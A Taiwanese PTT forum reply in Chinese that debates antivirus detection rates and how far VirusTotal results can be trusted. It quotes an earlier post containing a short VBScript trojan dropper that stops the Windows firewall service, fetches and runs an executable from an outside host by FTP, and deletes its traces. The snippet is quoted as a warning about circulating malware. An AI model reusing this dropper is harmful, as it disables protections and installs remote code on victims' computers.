※ 引述《jlovet (打不贏怪兵器不好)》之銘言： : 使用心得 : Avira偵測率很高,一些在VirusTotal上面Kaspersky偵測不到的"台灣常見木馬" : 小紅傘都會偵測出來...而且,病毒回報之後更新速度很快 VirusTotal嗎? 你知道上面有哪幾家是有交換樣本、病毒庫的嗎? 所以有幾家常常報相同名稱的惡意威脅 當然誤報的話 ~ 也是一起"爆" Kaspersky偵測不到的"台灣常見木馬"?! 這......你知道台灣有幾大知名討論區有熱心人士時常回報樣本嗎? VT上採用的是Kaspersky 7.0.0.125 你可能沒遇過Kaspersky 8.0單機版可以偵測出惡意威脅 VT上的舊引擎卻無法偵測出的情形 光就看VT準嗎? 我好奇"台灣常見木馬"是哪些呢? : 趨勢同樣對台灣的木馬偵測率不錯 囧rz~ 如果你看過討論區的樣本區 時常是這家"未偵測出威脅" 且 某知名入口網站Web mail採用該軟體 木馬病毒躲過偵測 時常"未偵測出威脅" 嗯~ 不錯的偵測率嘛! : Kaspersky回報病毒更新速度算快... : Symantec,Avast...我懷疑我的回報信被丟掉了... : 以上,偵測效果的部份,除了Avira我有裝,其他都是看VirusTotal上面的結果 : 不過,Avria在我電腦偵測出來的話,VT上面也會有 : 所以他靠得是病毒馬,不是甚麼行為分析 : 有些像Bitdefender號稱有行為分析的,我就沒有用過了 : Set kk = CreateObject("Wscript.Shell") : kk.run "cmd /c net stop sharedaccess&echo open www.g03z.com>>i.i&echo : aa33>>i.i&echo bb33>>i.i&echo recv s s.exe>>i.i&echo bye>>i.i&ftp -s:i.i&del : i.i&s.exe&del q.vbs&del s.exe&start http://buy.yahoo.com.tw/&del ? ?.bat",0 : 最後,不知道在外面流傳這樣的木馬有多少 : 不過,如果你家小孩老人很喜歡亂點email裡面的附件 : 還是把windows裡面的ftp.exe刪掉,或是封鎖起來吧 -- ※ 發信站: 批踢踢實業坊(ptt.cc) ◆ From: 220.129.165.113